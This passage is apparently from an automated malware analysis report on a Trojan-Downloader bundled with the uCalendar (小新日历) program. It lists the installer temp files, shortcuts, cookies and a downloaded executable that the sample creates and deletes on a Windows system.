%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F8PVH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TFPS7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-KJA02.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MTLQ9.tmp (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\a1[1].htm (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P6CRT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2J6MD.tmp (317 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5I6TG.tmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J8GQQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3DN0I.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-316BT.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BH7KA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G8JJ3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A9JQ8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S7KL5.tmp (555 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FGDDO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UMDHA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3C4AS.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFB1B.tmp (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J82M1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2NU3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OSOGC.tmp (399 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IUPL8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SAHIH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IE9GS.tmp (7 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\小新日历\小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SBNVG.tmp (13 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\小新日历\访问 小新日历 官网.url (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-QT79M.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CC08P.tmp (523 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NV4JR.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3SAPP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V00NQ.tmp (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G5L56.tmp (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-11QQC.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-97IOG.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0SJ8.tmp (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1PRVS.tmp (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJG3S.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RHLM.tmp (545 bytes)
%Documents and Settings%\All Users\Desktop\ÎäÒ×´«Ææ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8K221.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NMQV.tmp (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-76EL3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-77Q9F.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-THFVL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QI037.tmp (32054 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-453FH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RSEVU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.msg (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GDLU4.tmp (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BUO0T.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4U9TL.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T8AV0.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HIP4A.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPKRV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NB26.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HAV0P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NFLP.tmp (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S4UJK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ECGSQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BA97O.tmp (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-CR36B.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJ2MO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GGFP6.tmp (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9B6IC.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7SN9K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H81BC.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S0HP8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-UOMB9.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CQ2G0.tmp (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H454P.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNLME.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V0GI3.tmp (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6MUOK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K6A4L.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J3A1P.tmp (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R3ENI.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OT7F7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE59E.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N9TNV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F3GLM.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RPQTQ.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1BO97.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-EIJBG.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-224GL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16KT2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-457SG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0RAC9.tmp (379 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L9R13.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VC40Q.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-134QI.tmp (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-12F6F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EPU0G.tmp (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GR1F1.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J635K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-0RK1D.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0QAU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U8HBE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8CE4A.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-FG2A2.tmp (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LK4FU.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V625H.tmp (348 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-89JKG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-54RS6.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PVBA9.tmp (930 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-LQKHS.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-91HFL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7V3M5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RR67N.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D5SAM.tmp (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T93Q7.tmp (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2QH3K.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UEO5K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-412CP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3HB2E.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7AIGQ.tmp (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6C897.tmp (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2JDM2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RAN83.tmp (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-01GK7.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NU9MK.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D7GKR.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G4QOL.tmp (423 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L2QRQ.tmp (998 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D9EF4.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJMC9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8SQ3K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ICSK7.tmp (442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B1VSJ.tmp (565 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H6UDG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-PL60I.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q5IHQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q9602.tmp (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6U4PP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3OV3S.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIQHK.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5OQO8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ARCFV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD23K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U58P4.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SFKB5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V4CEI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B3HA8.tmp (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (1434 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GNV8E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6FEFD.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-776D0.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-5H9QJ.tmp (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S6Q82.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16QRI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SLEVI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ABKJC.tmp (956 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3B5UH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TVVUF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S26CD.tmp (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-CI790.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-94MCM.tmp (586 bytes)
%Documents and Settings%\All Users\Desktop\ Intener Hao123.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DASMI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8FIHU.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-Q84VT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PGQ9B.tmp (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OQ3T0.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99VDN.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-3G7MO.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CJ1R8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-U404O.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKH3C.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GQB0.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2FA4J.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6J672.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9UI34.tmp (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5B0J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S95AA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IT5G9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K8C4N.tmp (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GH8V2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8O12A.tmp (822 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TMDND.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-D9BCS.tmp (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VJS7P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NCEGP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VFH95.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MQF6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (2149 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPNA1.tmp (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NML75.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IBNEQ.tmp (18 bytes)
%Documents and Settings%\All Users\Desktop\小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V509A.tmp (313 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-POHV2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4EA8J.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NICBF.tmp (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAK3A.tmp (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-394GB.tmp (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\小新日历\卸载 小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G0SMU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\icon_9[1].gif (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CIVFE.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RERKV.tmp (530 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJF6C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-C4IKR.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RK743.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7UBNI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3LIFE.tmp (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-598FD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EEJC5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-41LLL.tmp (479 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\botva2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\CallbackCtrl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (0 bytes)

The process uCalendar.exe:1840 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\htmlinset1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\PopBoxSmall[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FMTFilterinset[1].txt (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xxurl[1].htm (361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[3].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[4].php (749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\weather.dat (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\md5[1].txt (32 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uiconfig.txt (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qian[1].htm (102 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tmp.exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (624 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@down.xiaoxinrili[1].txt (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[2].htm (488 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[3].php (751 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@count.xiaoxinrili[1].txt (206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\uCalhtml[1].txt (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
